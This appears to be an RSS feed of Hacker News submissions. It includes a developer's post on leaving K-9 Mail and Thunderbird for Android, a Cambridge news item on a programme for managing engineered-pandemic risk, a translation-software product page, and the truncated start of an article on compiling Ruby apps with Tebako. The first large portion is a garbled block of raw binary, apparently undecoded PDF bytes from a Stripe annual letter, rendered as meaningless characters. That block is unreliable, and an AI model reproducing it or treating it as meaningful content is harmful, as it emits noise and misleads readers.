~~çúšYùåoåýŸlc�×ìhaiD4¶í|}ƒm?M’®¿vØÆÙKf:<{M·_AŽú£•y‰eÖZK ™ôª¨ê” >N3õ—o G´5ë®d�Ùñ�Æ{ÔùègÈŠó_SúÊ—œð&§ñŒì79n¾±´ÍÈ�/]§$GQÝg}ãKNx“ÓxFvª Fe¿%)Ö¸þø×ÏøËÄçìþÙ¹Ç7þ®óä·™Ý7¾ä„{è�ÓxFvtÀ/Ë—#‰ûÄÍT’¡YUÛ¸=”>vVÓ¢€eqûmžxfÊGFµh´´à?ÏK½)µx¬eüa-ÝÂÇ»NÞN7‹7N¥ñ²ú&™JšH‘ÜõX”Œ®µQ|›¡“wt™7ê¶ŸxIdl|ÚiXPª}?ìšÇ{ì„aÃE£‹Î†›ó_OóÀæ™Ç|:mó±ƒnö–»ÙúƒCKóÚ[w§óçÇ„OÔRO:Vî¹óy‹úq7SÔ4Ô'ñ–Pw0ù›ãè”N÷»©þ©?J²8»„ßžÚ#Åç_p(*.ϧ—lôr»¹ŒÚ9±†ì‰sLÂÒw‘ï8AÜ ÄZ6žàâ‹¡?�Ķ‹’‘7e\`ú—Ư7·AîÁ¯5â<#;uĘ,‹GFãê€÷5™@Iæ5—$–NC2èáòVž©­OæÂÖÃN´‡<«Në�ë¥cò‹¯Û£ÐûÏkX„§ÌS˜Ïü‰¿ØzQcÒЭ£¯vªs¯¥SÔmûuçx«?Å#!þ¯Ö×Ü“pÔܧNÊð‰²[ ÙG¤ CöièÇeE�NÉæS?z5ÇÅCÍüÐú�Ü©rüm‡�/ß®³†­|2,¨qnO ÄñúÆ�žâ¹kF´\V´Ê2YnNBã°€²B@|?j¦îy‡_IŠe˜¶õ/zqÇ9´ìÜ©šÓĜп)ɈóF5=D¾áÉ‹’AoG꿞n³1m’²V£kî%îz"I¿²Bœiì×%„5÷‘¶iæ©‚0–O6¾vEèG1]~~ÖÑw æeê8itw3©)4ç?¹@ è\Ý�kêæU¥»9óüÈà[ªàò¢¥‡õÁÍç9eÏËH1×!Û¾]ŽM¿E#Û–”óL«L~Í›‡Tª§Úã¸�.;EFãö•3ŽÞ›äæãM�E#£i½xf¨}Öj:†5Òã=(µ†d;bä†C=‡ýœà¾IëØ©Y[Bp¸½ ¥­ŒÁzµ2M¿E#»­úâ¡ËChÂ¥øÔF›�âi;�çg§í>øPP™ÇÞ>Ù¸í¸º!'ÄK¢›9}ãô\YþÑ£tì˵ÎyËN“³ô9­þ�y=_Wá»Q6xÈJlÏÒeñkÞkÊK ÓŽ3›êÔZ¬lªó5Ïè§ö¸Ñ;kú�3«�2ç³ñ#û ¹Sîu¬éÌ'ÐùÎa“A£‹£_²âÍâ±T³ :®ú�:ÝV_ óMï¶n�g¥¹àhàµO†ð½øP|L2ŸÉV¶Òù¶ÖNgÿB‘ï|É orÏÈn{¡ÒvÕ¹ñ¥k$IÈ�îw¾ä„79��‘åçÏÝ~æô±Ë³:í“�7Yî�ÿ— >ÿÁ­²iz:UÜîL]��¾^n`²ÿO ‚šzÂI£V?oOÅá6~}Ú'ÊÌZa#ÎÑiß�¯yF?G€œ–²ßyß;?v*˶ãPºL7»‡‰:�.¼ù­ðëéÍ‚|?λѾ#:ïz÷ukÜJ?Ëîúú'åÏ·Pût ×'ótâO~¦øP(69Ò!Ú lžZ�¶h¼q]^‘S+’ SÙV”F“D6JÆKÎ+3)‹›üÿêÂëÿ¢ÎCžÏ½7jÉmYDdlÜî™Ù׳4¿Ü|08×È›ÛtÊ™-§DÛˆÒ¯4¹¼.u›¹{ó‹PYwÝJÙ B´ï˜SçëÑÇ-±‹ßêj}ãKNx“ÓxFæKü´z^KRé¤Ý*q|W÷v­@t’K¹H¨·¦¿æíŸ§ûŸáeÇë´ï°ÎÏÉRýß¹g¢_¯^Ý¢d\LÓþîܱoðû­Þ[>wX§}‡íüÜI4qbÝÊ*¿¸+.ÃyöÜaç4T¬£çž‰Þ‡ý͘¢ ê¬þRåâ™Íý©AM(5wª�8æØw˜Gf|è±vî.G_?w˜ý*z¬=–~‹–Ÿæ“ú…GŸ,ÎÊ«*tØêw@�M¨èª¹è±ÃÐe©µ“¢¹sDš[¿°x4ÇùLuµ9+³[¡P­Ñ=Gü£~CsÆpêÖ_!aP—7[Ñüâ¬èª«ÌiçG¿Õ‡qÈ¡ÊF?—o¡êÕùh§ôÌÉÝgþcÈÛ¨™.îNmŽ~O¨¼¦Þ&m²Q5G½Ï«b[ýTÖ_昚9¬ái›† �wOÛ+Ãyô2ÿÎý¤‘aë© ë?%°¸ïKôޝÑAcÄ�2æ¨(#£q;ÂvÔ“)ÉâJÍåì÷ÐCáu©®�5^ýsdëa'Éþê÷ìüì÷tn/;“KÃD,÷|Y1«?;8~tãêpé4cÖ‹Ãc}�ÞïûãYö#yö{P¾3ªéÕ׉ ý7Sõ>îâÑOŽwظeš]RÐ!»Å%[C^U²�ìJH�Úy<ÍÌ­—äF™xõ{:_¾]Ñ�HŸ Z@9›h¯o¼÷{ ¶¬h•WÜ37v4ÏOt÷£¯¿bŠÙïÙéÙïé\øJV�99±òúRl+x9’ÕïéÖ¦qyÖ‹ŽÆå-»°WçOí<KeÖà‹.Gv'.;”Æ„¾làƒJmø¨À÷©7À5§�sLÓ´¢Äâ¡|Ò8¨µ&7{¶SÎê¢ÛŽ2_3¢Ÿ™ª †&߸yJ÷ír¼ËùÆéèŸ9'‹‡öß7}?îÒ�¢ú„÷Ì_“Dc¼Óè®[é$«X»x¨sïÐðqüw‰Ú:Ðo¬O­©Onn?+s[3kÊ‘µtJÛ''Ë4æ\E ‘ÚúÎE’U-âr]ü¬?"´CªÎ(úÏ}ý)#½M¥ÑØÀÉrSoœ{ÚFçÜF«<Ê>ŠŒÆ×<£Ÿ [†g#ç¶· 1ç³ñ£Z¤ùóIÇH§‹£±<ý)ÜÈvóì¢ÑEÑÚ•Ø4K5 *I*SèÔi±ªÅÎ7½Ûº5ž•VI<+Û7âÔŽïýTU³úÿì¼åÅŽ~•Šb?þþ�/9áMNãÙ7|YÌÊNoÊÈ�/]‡¤—¸ç8úΗœð&§ñŒl¿éàUî¸$ kÜ„*ÇGV§}²ñ&Ë-›)¹¾‰Å¿q«lÚåAáKA _;ÂÖ4”æ¡ÑéãtIº¾ÊsÒ¿ÉÈ¿ð�œÜ� §µ2"ÈcG '5ȱ#°“¯yF?'ÃË¥FôþÆÛŽøÅ玈æm¢Ú't>ªG4ºD‹FÞ¬qZñiñXªY�ïgGl´íˆ�oz·uk<+�“Î1±}£|àB°D¡ÞQ)¨W�Ž| s彘Ÿ¹^tOž¨¬Ð.ŒetÎE[˜“ÒóâN×eFÞ9ytIDO½�JGÝy}ÚÌU'ø§kGÆÓQ05WÑ$ß4Wü­}ÙžçOT§‰É1OE[¥úxw¨ëwÒÈvV(fjg,.¿³r$Mæ›Fe§ãM£�;ØM@Îý䊱xÆ\Yu¨ ñ©ªG¡£ ’u¦_R˜²õ¢‘mbì>ç>y,•ü¡fîp”ùLû-Ê=tLíM2:w‰¤ôÞ$Ÿ»ªë±(Ñúb.†9yèš¡Ý=Þ4Úì!IKå9|¡ñ;ºŸ}ãì=ü²|9’tÚâƒf*{‘æ•Ç6nq’¢¥+µaqûmäý™©"z½8h´”Çp«ê´-k-”ƒ�Û¤�v‹wó´aºd~¢´)ÉM�E#£i½ø6CõxÓh£Ê0û‰—DÆÆ§�†ÅC2ýklÛ£ÁU‚¬ÄH˜6î¬ ØvçÇyü?EÕTµ¤zÉ ˆDõ/qtJ§ÏµÎ¡g9¹•ÆÍ”Äâ³:.*k2•Ð%;:zð¾ìª![°}Î1gu|»Ú4·ôGŠ/õ®v�“Ò}þÐzR2."�¹diO[1ƒ“5â±�µ9ŽêxãÒ“QG²�2æ"[Õq´S?çiâÇØ” sqüL(Â¥19Ŧ�NîÀ‘güæÑÄÿH§ìó>,rz²19ä°È¢S<àʶÆC9‰UQnZžêN´Nj)拓É0Kæy(§_¸zÊL9Ò�rÈ>cJôs»�OJ¶Ùd™ØÉãiË+›äFíÖ£:Þ8q÷k?�¾,è!'²X¯oÜ?ªãÒò°¢U>ªãÌ)ý•˜ŸÕqæïpºÄt¤Ïêø]ÕñÆ3¼ã‡8’¯\V‘š �Q‘ýY»(ô{å×}ñäÛlÌ_–\ÖjtÍ=•”¦'çÓždhûaî×%ä0ncrìôO6ÞcùÕÁÃ12‘¯œ×­¼gDSÃ�,±‘W?J *‚6P¥$?óÀIcƒ�5Òàeê“‹"6š[šX× Ü2yc§=oì|Í3úñh!°ìû�÷¼qçGÞHsÉ…~1J—™ šåKýJ�Fé‚ÿÄ>¿žÞ,(C”åìTd‘jy62ßônëÖ¸•fçÆØëë“ò�›Lð*ÊǾÙ¼ºNŠ›H,ªU—~ñÛÍéÇÝòc|O¬#g£N.¡•_гsí2GŸÜ$·mz,íCƒ öZÜe…åu�§Ý쪓‹¦]‘XÎbMô¢#£qÛÒ ¼…½ò¾§m2د|Y+¼ÉùÆ�ªnmìÓÁ—–¶²“Uí3j–mó_´ö/)Š÷ñ½óü&NV¨q>ó´çýHú'"+Í¿æ €^’DDú¢±ŒÄS„)ÍU'h‚ ¦&ÃŒKuº­rã"à|á]’-øxjÓcÑÈhZ/¾ÍPSIGT|Þ¨¨­×hí#cãÓNåýwû_W1d­[yÿÝŽQÕ ÀŸÇY¶;?ò$T4ÖÑ3— ÍŸ‹¦0:¥Óç^qw¼ »8¯¿Éå·؉ô* g~tÉF/n×ò¬D`åIwÞr§ÉóÈ“PϲzQãUæs¿j¬oh=idPêGL#N[±²f+jÄ™'uÚó¤Î­ÅÌ“"™«×\8ûÌ“èAaY4*š‰lù¢Ÿ3G¦\yÒΓ6�ý‹Ëf$¥¡#ùljäGôðdT¦ÑiÆäd¯×XßÅ£÷Û}sÙ�ä™'¡öëè[­|(2äŸ.µæ»i“G?±VÏsÊ>²R–ì3ŽÑïÂj%{ÑȶÁž<ÖOO³\‡ÖKr£¶ÀÊ“:gúáÛc?4 ®\!^ßxÏ“h¹¬è‘•'±¢#é5Wßî­<ÉLw—âyÚ¢Ìú‘âJ¢ôà —„ ²ã>Æ™Æ'ļÐ;¬º0‹F¶Nðøý4qŒ_+$ôËVxÓF—¿ sF gÕ«ôP÷±yÅØ'ë!>Ö¸  éyçC^Ï»KÏo|É orÏȾą́ŽÎòŽŒÜøÒuJrnÔJ}ãKNx“ÓxF¶á?�kÙiI*k<í«W¡ÍmGó(:u.DÈÚå2ÆÀïÇçä­S+zÕ—Xþ¦|uü×9Í ‹®WMýxÏâ¡—·¦”ѧhvÛèëßoùcEâ�¯¹fÌÇõJúðm§59ßø²XøÛ骮�îßø&Ç­-?üÆ»ž]Îwnõc‡_œÊj[§L¨Å·RVõ–Z¼ÖC®Ãƒ;eKÜÄX½ÅCMÎvTm›l ]~�©ç÷`fè“e™ácþU·?½•�;">ÖxßYO)‡ª¢òèo|É orÏȾq™§û²fFnÜ—‡®S’„°r*?þ‘/9áMNãYô}ßYÛ'¾<$ k¸·Ë+òùDB)•÷�èÔ¸Ð8²ùÛSkgÕ)*=×DàÛ3é±ã-«¾hV2Çor×ÎC­Ò‘¡Íœóöä9OÙœŒ÷pAÃs"C?…çgp|ꑹ bN:)?oq™ÀȾ>U¨h=*äM¿E#[Eé ¤þÓï‹ÇVo×»F’IÑ? V§ËN‘Ѹzà¢ò#®Kf‡aró®Ç¢‘Ñ´^<3T9Ø ¨fƒ›Ñ˜=ö�j%ewã~"2šý´¸%­c'²kK^Ço»„®•¡ëå‹]??ÙmÕÏ—‡Ð„Kñ©�6;ÅÓtéäpþ5Öî>˜7mµé)Üv ì¼ï¼—ÅúIlù¾ä„79�gdݧ‡Ò˜IX~î˜ŒÜøÒuHµÇï¤}ãKNx“ÓxFV„ü9>½òV ¬>Ö^û#:müȉB–;#+gOÍKˆD†NéVòÅEߺmÛ¨Ñ˦6òòʤC]äGtÉFõM«¦µóV¿!ï'cš´üÍÓÊu‘ª~ÛÊòp¹™ÏœÆZOr3y#5[Qþ@�8û �®È�§�3•"Y?¥æ¢þ™ýz8]Y ½ß�9Фe'U9ÿ´ÓÉ�—ò›ßÜ� ìÒ0ÛBC5+fß̪†Ô‡è4cÊmíZßÅ£7i�²ɳ߀ÚÒãŽÄæ}…Èà0jðú-ÐÅ£ŸtT]9e]RÐ![@˜q'úåïBFö¢‘­|ûø$z/O3óCë%¹QF0ˆô02§êðí±Lî° ø¯jãõ�sšÕoˆ–‡­òê7°¢Vï¸=ñ£ð±�e_• Áöx}²ñ^‡‘ô|ÊÓ#éï¾Ñå|ã½Sô­tA+/ýÆ79YÙ\æü�oz69߸³Z#DÖú‹Ÿ$ôã$v‡jÛde2æ]L®¨°¨õÂ-³4«óÐ÷Kš Q¹PÄ}¤À—ü ÖA�V\d4nW)R¸aÍ'<*�¶+Šú×Úy(?}% Ÿ4²S®×ßO·²�ä åí�.©“€†.Ðî>¡I÷1{ÛýO�ùä�*&>–ÛòÇÕQÒxä¼õ^æÒzûh§-k߸vŽÕLZÉé±û‘W¬¨‘.- £Ç¢ÿuÿ1ø}Îiq8¡³-2?²·_”kpRŽŒ�Ÿ§ý'Mû"VùÅ?÷ËX}þ¦›ŸOo÷ó·°ü¯Ó~‹fL½"òÅ“g6j¯¨‹Ûœà¡$Œ9:�ßÙŠÞ—·j-2èqø}ž§å4|B3+ÙhF”£ »2Ú±bM¿E‡O°¸˜^ºˆv#N�•W_ãª'½h¸×^‹»ó-juK‰‚ãw³¢ù…æ¢Cf´øÐü"®Ú6áów¶¢¹ÖŒÛ´�ø'ý¢yìòLÈ̺mÞ|Ïû®Î´z‡1¯œàŸ�¯oD;æ¢}¾ñ%'¼Éi<#‹/92‡%i蔬õ5ÞÜ[߉N�¯od [Å’zè;_r›œÆ3²5sÅQ}Â%iè䜪‡ºr¡èÔx“eP«ïæ;^ô�/9x—Ó¸‘}C!Á}|²Î#w¾t�$‹»Ñ"é_rð.§ñ1òÇ÷«Û·$•5.Îf•YÐ~J8ÕÃÆ•ènöDY'}î;¾ñr ªœR÷‹8�†’qOj'\$êïGÝ.œ\umnÑ�o6‡Š§ ìO»Rr5e˜ªþ$nÛ:U7†?ï/å.ܘ«¸Áä¿®"²-�‚I]Òõ;idK¢R6Æ*‹‡êør)šK2Ûp£ì”lºâTç’™ãÍæpå�â¤ø¬¼£‰ �ßÛt5ûqÁp-šŠaÎqÒÈvÐjàÍU›¼,¥aU–ºZVõø´ßAmTY€µ�ŒÆm"ý zo’Ï“¥ë±hdÐúa.BêÉ·Ê¢ÉN�Ðe�•ÇDFãÍ7évúÙ7ÎÞÃ/‡/“¤ QûËI'Ëø �m\®šŒc¬¦¶®,¢èì dFšêé4Z*f]Ä7Ok-4�á2Ý,Þ¸Í}™¾Ã&™Ÿ(ÀKrÓcÑÈhZ/ºfHÜx³y£2û‰— �O; ÖÛsQ>á-\�Ñ܃ùdž˜±­¤‹áŠý‹ß/n¢/Z&™©í82¢�Ò‡ãO»4Îù…K2…ËZ§o]…³÷c£d\ ó´Qc¯ÅïõÎêÓ¡ˆžQ§æ/x;o#cã+ó‰&±WYåwø�$™ÈȈBÝÃè™ãtû-š1Å<טµïÏlÓñÛ/™ØÈˆPÎ4æÈVF½µQ=VF„kÀ¸$Âí”ì8v%åz5ndŸ+F�¥ß¢•WÄâæ^ºðü‘qXyüçótêužÙß…Š…ÎŒ(tYŠ�Ì'š›esjœ<š›¿ü©Æ<3"TBt­ØtŽH�ë74w‡ýºþá·ØïWqK²~ß²}²ñs®Ù1yô?¸±}SL çÆÿ6#àè#„Úüã÷¹›�æ7íÉ1椱�lAzS¿Ñ»øý*ÿ3Nýæ¦Çl7*å:ú_óŒ~²öÛ�–ÆpG £}Îgã³�êP ¥Ëè d>ºovZ§ÑÅ¿ÈÎ÷®Ã/ ꔿtÊ/Xdz‘Ñø¦w[·Æ­ôÍm¶^=ÍõIùÀÍ–�'ÔœV4â�ÛM£®ƒ.PJ2¢½ ¤g!]¿ßôŒ•ƒUG,JÏ›°¯çUÀâb÷C‘WTe“ü/ôª(˜uκ¥»ßlX?|êa®žwZŒî¢ áæ(•†ìµ7ý�l_tŠÔåkñØêã~¹<ÑtgÔîtÙ)2[Ç-Ý&ùôڮǢ‘Ñ´^{dXy1*§j§ýTÝùyzÞô\‰xè_üsÓDÊóü~žªôVÝ&¬eîÇ9Iïe¿E3¦ÄŸ#0sã™�>´5*zœª¨Ê`̱Ÿªô¾èÔ>£Ç:U=Ï�†&–|žªF”æ»2Ú±bM¿E‡O°¸‹—Ò…g�8>VÞÁލf«gÆ—ç©Ú-ÅÙÇéÍõDj5>4¿p¾SgvÆ�æR¯j‘½Fü“~¥ù�H=ÎʆvoöÉ[H¨LvÕ·æÔ9ƒ(OÉŠ>/ç¹’'»î_r›œÆ3²š@bPÙË:Ÿ3rãK×!é#‚¦1ú•/9áMNã™Û!\£IÖà±ëé'ë“�7Y&£Ïn—&Ž}ãV´Ǚü�yfê*¾Å·BÓ/¬îƹcŠDI©Ð(Oyhˆþ¸Å�¥§ª§9xdq¬ýFÅÙ•ct¾æýäp¶ ƒû;ï9ÆÎ�½Ø~,]fÖ`>z>ÚÀ�F§=¿fˆÆ…

    Article truncated for RSS feed. Read the full article at https://assets.stripeassets.com/fzn2n1nzq965/2pt3yIHthraqR1KwXgr98U/df10795aac0205789956c89e0dfc4f1a/Stripe-annual-letter-2024.pdf

    ]]>
    https://assets.stripeassets.com/fzn2n1nzq965/2pt3yIHthraqR1KwXgr98U/df10795aac0205789956c89e0dfc4f1a/Stripe-annual-letter-2024.pdf hacker-news-small-sites-43196735 Thu, 27 Feb 2025 17:59:37 GMT
    <![CDATA[A love letter to Opera Mini]]> thread link) | @panstromek
    February 27, 2025 | https://yoyo-code.com/love-letter-to-opera-mini/ | archive.org

    Unable to retrieve article]]>
    https://yoyo-code.com/love-letter-to-opera-mini/ hacker-news-small-sites-43196634 Thu, 27 Feb 2025 17:47:58 GMT
    <![CDATA[Tokyo court upholds suspended jail term for former Nissan exec]]> thread link) | @PaulHoule
    February 27, 2025 | https://www.japantimes.co.jp/news/2025/02/04/japan/crime-legal/nissan-kelly-high-court-ruling/ | archive.org

    Unable to retrieve article]]>
    https://www.japantimes.co.jp/news/2025/02/04/japan/crime-legal/nissan-kelly-high-court-ruling/ hacker-news-small-sites-43196506 Thu, 27 Feb 2025 17:33:25 GMT
    <![CDATA[Goodbye K-9 Mail]]> thread link) | @todsacerdoti
    February 27, 2025 | https://cketti.de/2025/02/26/goodbye-k9mail/ | archive.org

    TL;DR: I quit my job working on Thunderbird for Android and K-9 Mail at MZLA.

    My personal journey with K-9 Mail started in late 2009, shortly after getting my first Android device1. The pre-installed Email app didn’t work very well with my email provider. When looking for alternatives, I discovered K-9 Mail. It had many of the same issues2. But it was an active open source project that accepted contributions. I started fixing the problems I was experiencing and contributed these changes to K-9 Mail. It was a very pleasant experience and so I started fixing bugs reported by other users.

    In February 2010, Jesse Vincent, the founder of the K-9 Mail project, offered me commit access to the Subversion3 repository. According to my email archive, I replied with the following text:

    Thank you! I really enjoyed writing patches for K-9 and gladly accept your offer. But I probably won’t be able to devote as much time to the project as I do right now for a very long time. I hope that’s not a big problem.

    My prediction turned out to be not quite accurate. I was able to spend a lot of time working on K-9 Mail and quickly became one of the most active contributors.

    In 2012, Jesse hired me to work on Kaiten Mail, a commercial closed-source fork of K-9 Mail. The only real differences between the apps were moderate changes to the user interface. So most of the features and bug fixes we created for Kaiten Mail also went into K-9 Mail. This was important to me and one of the reasons I took the job.

    In early 2014, Jesse made me the K-9 Mail project leader4. With Kaiten Mail, end-user support was eating up a lot of time and eventually motivation to work on the app. So we stopped working on it around the same time and the app slowly faded away.

    To pay the bills, I started working as a freelancing Android developer5. Maybe not surprisingly, more often than not I was contracted to work on email clients. Whenever I was working on a closed source fork of K-9 Mail6, I had a discounted hourly rate that would apply when working on things that were contributed to K-9 Mail. This was mostly bug fixes, but also the odd feature every now and then.

    After a contract ended in 2019, I decided to apply for a grant from the Prototype Fund to work on adding JMAP support to K-9 Mail7. This allowed me to basically work full-time on the project. When the funding period ended in 2020, the COVID-19 pandemic was in full swing. At that time I didn’t feel like looking for a new contract. I filled my days working on K-9 Mail to mute the feeling of despair about the world. I summarized my 2020 in the blog post My first year as a full-time open source developer.

    Eventually I had to figure out how to finance this full-time open source developer lifestyle. I ended up asking K-9 Mail users to donate so I could be paid to dedicate 80% of my time to work on the app. This worked out quite nicely and I wrote about it here: 2021 in Review.

    I first learned about plans to create a Thunderbird version for Android in late 2019. I was approached because one of the options considered was basing Thunderbird for Android on K-9 Mail. At the time, I wasn’t really interested in working on Thunderbird for Android. But I was more than happy to help turn the K-9 Mail code base into something that Thunderbird could use as a base for their own app. However, it seemed the times where we had availability to work on such a project never aligned. And so nothing concrete happened. But we stayed in contact.

    In December 2021, it seemed to have become a priority to find a solution for the many Thunderbird users asking for an Android app. By that time, I had realized that funding an open source project via donations requires an ongoing fundraising effort. Thunderbird was already doing this for quite some time and getting pretty good at it. I, on the other hand, was not looking forward to the idea of getting better at fundraising.
    So, when I was asked again whether I was interested in K-9 Mail and myself joining the Thunderbird project, I said yes. It took another six months for us to figure out the details and announce the news to the public.

    Once under the Thunderbird umbrella, we worked8 on adding features to K-9 Mail that we wanted an initial version of Thunderbird for Android to have. The mobile team slowly grew to include another Android developer, then a manager. While organizationally the design team was its own group, there was always at least one designer available to work with the mobile team on the Android app. And then there were a bunch of other teams to do the things for which you don’t need Android engineers: support, communication, donations, etc.

    In October 2024, we finally released the first version of Thunderbird for Android. The months leading up to the release were quite stressful for me. All of us were working on many things at the same time to not let the targeted release date slip too much. We never worked overtime, though. And we got additional paid time off after the release ❤️

    After a long vacation, we started 2025 with a more comfortable pace. However, the usual joy I felt when working on the app, didn’t return. I finally realized this at the beginning of February, while being sick in bed and having nothing better to do than contemplating life.
    I don’t think I was close to a burnout – work wasn’t that much fun anymore, but it was far from being unbearable. I’ve been there before. And in the past it never was a problem to step away from K-9 Mail for a few months. However, it’s different when it’s your job. But since I am in the very fortunate position of being able to afford taking a couple of months off, I decided to do just that. So the question was whether to take a sabbatical or to quit.
    Realistically, permanently walking away from K-9 Mail never was an option in the past. There was no one else to take over as a maintainer. It would have most likely meant the end of the project. K-9 Mail was always too important to me to let that happen.
    But this is no longer an issue. There’s now a whole team behind the project and me stepping away no longer is an existential threat to the app.

    I want to explore what it feels like to do something else without going back to the project being a foregone conclusion. That is why I quit my job at MZLA.

    It was a great job and I had awesome coworkers. I can totally recommend working with these people and will miss doing so 😢


    I have no idea what I’ll end up doing next. A coworker asked me whether I’ll stick to writing software or do something else entirely. I was quite surprised by this question. Both because in hindsight it felt like an obvious question to ask and because I’ve never even considered doing something else. I guess that means I’m very much still a software person and will be for the foreseeable future.

    During my vacation I very much enjoyed being a beginner and learning about technology I haven’t worked with as a developer before (NFC smartcards, USB HID, Bluetooth LE). So I will probably start a lot of personal projects and finish few to none of them 😃

    I think there’s a good chance that – after an appropriately sized break – I will return as a volunteer contributor to K-9 Mail/Thunderbird for Android.

    But for now, I say: Goodbye K-9 Mail 👋


    This leaves me with saying thank you to everyone who contributed to K-9 Mail and Thunderbird for Android over the years. People wrote code, translated the app, reported bugs, helped other users, gave money, promoted the app, and much more. Thank you all 🙏


    ]]>
    https://cketti.de/2025/02/26/goodbye-k9mail/ hacker-news-small-sites-43196436 Thu, 27 Feb 2025 17:26:21 GMT
    <![CDATA[Cambridge initiative to address risks of future engineered pandemics]]> thread link) | @gnabgib
    February 27, 2025 | https://www.cam.ac.uk/research/news/cambridge-initiative-to-address-risks-of-future-engineered-pandemics | archive.org

    These are some of the questions being addressed by a new initiative launched today at the University of Cambridge, which seeks to address the urgent challenge of managing the risks of future engineered pandemics.

    The Engineered Pandemics Risk Management Programme aims to understand the social and biological factors that might drive an engineered pandemic and to make a major contribution to building the UK’s capability for managing these risks. It will build a network of experts from academia, government, and industry to tackle the problem.

    Increased security threats from state and non-state actors, combined with increased urbanisation and global mobility, means the threat of deliberate pathogen release must be taken seriously as must other intertwined aspects of pandemic risk such as mis- and disinformation, the erosion of trust in a number of institutions and an increasingly volatile geopolitical context. Further potential risks are posed by recent developments in gene-editing tools and artificial intelligence, which have rapidly advanced technological capability that may make it easier to engineer potential pandemic pathogens.

    Professor Clare Bryant from the Department of Medicine at the University of Cambridge said: “There is a great opportunity to take a joined-up approach to managing the risks posed by engineered pandemics. We need experts and agencies across the spectrum to work together to develop a better understanding of who or what might drive such events and what their likely impact would be. And we need evidence-informed policies and networks in place that would help us respond to – or better still, prevent – such an eventuality.”

    • The aims of the Engineered Pandemics Risk Management Programme are:
    • To develop the conceptual underpinnings for the risk management of engineered pandemics based on interdisciplinary research
    • To support the capability of the UK’s engineered pandemic risk policy and practice, including building and maintaining networks that connect government, academia and industry.
    • To strengthen the international networks that will support this work globally

    There are four main strands of work:

    Social determinants of engineered pandemic threat

    This strand will look at the actors who have the potential to engineer harmful pathogens, either deliberately or accidentally. It will ask questions such as: What could motivate bioterrorism in the coming decades? Who might the relevant actors be? What are the kinds of engineered pandemic that someone might want to create?

    Dr Rob Doubleday, Executive Director of the Centre for Science and Policy at the University of Cambridge, said: “The common narrative is that there’s a wide range of potential actors out there who want to create bioweapons but don’t yet have the technical means. But in fact, there’s been very little work to really understand who these people might be, and their relationship to emerging technology. To explore these questions, we need a broad network including social scientists, biosecurity researchers, criminologists, experts in geopolitics and counterterrorism.”

    The strand will also look at the governance of scientific research in areas that may facilitate an engineered pandemic, whether unwittingly or maliciously, aiming to deliver a policy framework that enables freedom of intellectual research while managing real and apparent risk in infectious disease research.

    Professor Bryant said: “As scientists, we’re largely responsible for policing our own work and ensuring integrity, trustworthiness and transparency, and for considering the consequences of new knowledge and how it might be used. But with the rapid progress of genomic technologies and AI, self-regulation becomes more difficult to manage. We need to find governance frameworks that balance essential scientific progress with its potential misapplication.”

    Biological determinants of engineered pandemic threat

    Recognising that the most likely cause of an engineered pandemic would be the deliberate release of a naturally-occurring pathogen – viral or bacterial, for example – rather than a man-made pathogen, this strand aims to understand what might make a particular pathogen infectious and how our immune systems respond to infection. This knowledge will allow researchers to screen currently available drugs to prevent or treat infection and to design vaccines quickly should a pandemic occur.

    Modelling threats and risk management of engineered pandemics

    The Covid-19 pandemic highlighted practical problems of dealing with pandemic infections, from the provision of personal protective equipment (PPE) to ensuring a sufficient supply of vaccine doses and availability of key medications. Modelling the potential requirements of a pandemic, how they could be delivered, how ventilation systems could be modified, what biosafety measures could be taken, for example, are all key challenges for managing any form of pandemic. This strand will address how existing modelling approaches would need to be adapted for a range of plausible engineered pandemics.

    Policy innovation challenges

    Working with the policy community, the Cambridge team will co-create research that directly addresses policy needs and involves policy makers. It will support policy makers in experimenting with more joined-up approaches through testing, learning and adapting solutions developed in partnership.

    The Engineered Pandemics Risk Management Programme is supported by a £5.25 million donation to the Centre for Research in the Arts, Humanities and Social Sciences (CRASSH) at the University of Cambridge. The team intends it to form a central component of a future Pandemic Risk Management Centre, for which it is now fundraising.

    Professor Joanna Page, Director of CRASSH, said: “Cambridge has strengths across a broad range of disciplines – from genetics and immunology to mathematical modelling to existential risk and policy engagement – that can make a much-needed initiative such as this a success.”

    To find out more, visit the Engineered Pandemic Risk Management website.

    ]]>
    https://www.cam.ac.uk/research/news/cambridge-initiative-to-address-risks-of-future-engineered-pandemics hacker-news-small-sites-43196337 Thu, 27 Feb 2025 17:16:32 GMT
    <![CDATA[Simple but great Translation Management Software]]> thread link) | @maximeburri
    February 27, 2025 | https://www.branchlate.com/en | archive.org

    Simplify and accelerate translation management

    Branchlate empowers developers and translators with a streamlined, efficient, and real-time translation process.

    Manage translations with Git branches using the simple CLI. Keep your source of truth aligned with your code.

    Intuitive interface and AI

    With AI-powered suggestions, translators save time by focusing on refining translations.

    Live preview without deployments

    Instantly preview and modify translations on the development environment, without needing a developer or deployment.

    Simple, transparent pricing

    Start with our free trial. No credit card needed.

    Solopreneur

    Perfect for individual entrepreneurs

    • 1,000 auto-translated words per month
    • Standard support
    • Chrome extension
    • Team members
    • Screenshots
    • History

    Startup

    For growing teams and businesses

    • 5,000 auto-translated words per month
    • 24-hour support response time
    • Chrome extension
    • Team members
    • 100 Screenshots / month
    • History

    Enterprise

    For large organizations

    • 10,000 auto-translated words per month
    • 6-hour support response time
    • Chrome extension
    • Team members
    • Unlimited Screenshots
    • History

    Frequently Asked Questions

    Rue Peillonnex 6

    Chêne-Bourg

    Switzerland

    ]]>
    https://www.branchlate.com/en hacker-news-small-sites-43196279 Thu, 27 Feb 2025 17:10:19 GMT
    <![CDATA[Compile Ruby Apps with Tebako]]> thread link) | @thunderbong
    February 27, 2025 | https://terminalwire.com/articles/tebako | archive.org

    When I started building Terminalwire, I decided to build it out using Ruby since that’s where I’m most productive and it keeps getting better and faster with every release. I also knew that put me on a path where I’d have to confront the reality that Ruby is notoriously difficult to distribute to users who don’t have Ruby dependencies installed on their machines, which I wrote about last week.

    Fortunately, I found a project called Tebako, which can compile Ruby applications into concise binaries that run on Windows, macOS, and Linux.

    Let’s take a look at how Tebako works in practice for the Terminalwire Client to help you get a better idea of how you might start using it in your Ruby projects.

    Terminalwire is a client-server application that streams terminal commands users enter into their terminal, like tinyzap link create, to a server running the command-line app. The server receives the tokens ["tinyzap", "link", "create"] from the client via WebSockets and processes the command, streaming standard I/O, browser launch commands, and more between the command-line thin client and the command-line parser running on the server.

    In our example, the tinyzap binary isn’t the Tebako binary itself. If you open one of these binaries via cat $(which tinyzap), you’d see something that looks like this:

    #!/usr/bin/env terminalwire-exec
    url: "wss://tinyzap.com/terminal"
    

